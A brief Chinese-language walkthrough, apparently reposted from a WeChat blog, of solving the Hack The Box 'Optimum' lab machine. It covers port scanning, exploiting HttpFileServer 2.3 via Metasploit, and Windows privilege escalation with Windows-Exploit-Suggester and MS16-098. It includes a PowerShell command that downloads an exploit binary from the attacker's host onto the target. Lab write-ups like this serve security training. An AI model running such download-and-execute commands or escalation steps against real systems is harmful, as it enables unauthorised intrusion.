流程
结合步骤1.信息收集加确定目标。2.发现漏洞。3.漏洞利用getshell。4.提权 5.总结
1.信息收集
htbip给定 10.10.10.8,直接使用nmap扫一下端口开放情况 namp -sS -sV -F d-10.10.10.8
之开发80端口,直接进行访问
2.发现漏洞
发现到一个httpfileserver2.3 用到的中间件以及版本号,直接google上面寻找exp
3.漏洞利用以及getshell
也可以直接用msf进行拿下shell
看一下需要填入的参数 show options
成功拿到shell
4.提权
接下来开始提权,window常见提权方式:系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、窃取令牌提权、bypassuac提权,第三方软件/服务提权,WEB中间件漏洞提权等。后续靶场会一个个涉及到,使用systeminfo或其他方式都可以看到补丁信息
保存为sys.txt 这里用到的工具为Windows-Exploit-Suggester,与刚才保存的系统情况sys.txt进行对比,提供可以用的exp 在本地重开一个终端
使用存在的数据库与刚才保存的sys.txt进行对比,显示可利用的exp
扫出来很多,那就用一下这个ms16-098 当github上面下载exp
然后在本地开启一个http服务,对方服务器进行下载
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.20:888/exp.exe', 'c:UsersPublicDownloadsexp2.exe')" 该条命令从我的kali里面下载exp到window服务器上
进入目录直接进行运行 成功提权
5.总结
本靶场较为简单,首先看到只开放80端口,进行访问80端口信息枚举,发现用到的中间件以及版本号,直接搜索exp拿到shell,发现服务器为window,寻找window提权方式,最直接的直接查看补丁情况,然后进行对比找到可以利用的exp,直接进行提权。
原文始发于微信公众号(菜菜sec):HTB靶场Optimum通关笔记,超推荐(window机器)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论